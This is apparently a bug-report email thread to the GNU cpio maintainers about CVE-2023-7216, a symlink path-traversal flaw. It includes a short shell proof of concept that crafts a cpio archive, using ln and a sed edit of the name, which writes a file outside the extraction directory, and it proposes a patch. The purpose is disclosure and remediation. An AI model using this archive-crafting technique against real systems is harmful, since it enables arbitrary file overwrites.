Dear cpio maintainer:
This is a Red Hat Community Report on CVE-2023-7216:https://bugzilla.redhat.com/show_bug.cgi?id=2249901
CVE-2023-7216 can cause path traversal when opening a cpio archive, which can lead to malicious file overwrites of arbitrary directories.
Redhat CVE-2023-7216's Poc can be reproduced using the following method:
```
[root@localhost home]# mkdir testcpio
[root@localhost home]# ln -sf /tmp/ testcpio/tmp
[root@localhost home]# echo "TEST Traversal" > testcpio/tmpYtrav.txt
[root@localhost home]# cd testcpio/
[root@localhost testcpio]# ls | cpio -ov > ../trav.cpio
tmp
tmpYtrav.txt
1 block
[root@localhost testcpio]# cd ..
[root@localhost home]# sed -i s/"tmpY"/"tmp\/"/g trav.cpio
[root@localhost home]# cpio -i < trav.cpio
[root@localhost home]# cat /tmp/trav.txt
TEST Traversal
[root@localhost home]# cat tmp/trav.txt
TEST Traversal
```
First of all, I would like to confirm with you, do you accept CVE-2023-7216? Is CVE-2023-7216 a bug or is it the default behavior of cpio software?
If CVE-2023-7216 is a bug, I try to provide a fix patch. Of course, if there is a better fix, please point it out.
CVE-2023-7216 is similar to CVE-2015-1197,Both of them use symlink to cause Path Traversal.The CVE-2015-1197 fix uses symlink_placeholder () to fix a Path Traversal issue in the --no-absolute-filenames scenario.However, CVE-2023-7216 proves that path traversal also exists in other scenarios.
So I made a patch to fix CVE-2023-7216, copyin_link() should enable symlink_placeholder() by default, not only when the --no-absolute-filenames option is on.
Look forward to your feedback and suggestions soon.
Best Regards,
Peng
------------------ Original ------------------
From: "2773414454" <2773414454@qq.com>;
Date: Tue, Feb 20, 2024 11:03 AM
To: "bug-cpio"<bug-cpio@gnu.org>;
Subject: Is there a fix for this CVE-2023-7216?
Dear cpio maintainer:
https://nvd.nist.gov/vuln/detail/CVE-2023-7216
NVD does not provide any related patch information.
Is there a fix for cpio's CVE-2023-7216?
[1] If not, what is the repair plan for cpio?
[2] If yes, can you indicate which submissions fix CVE-2023-7216?
peng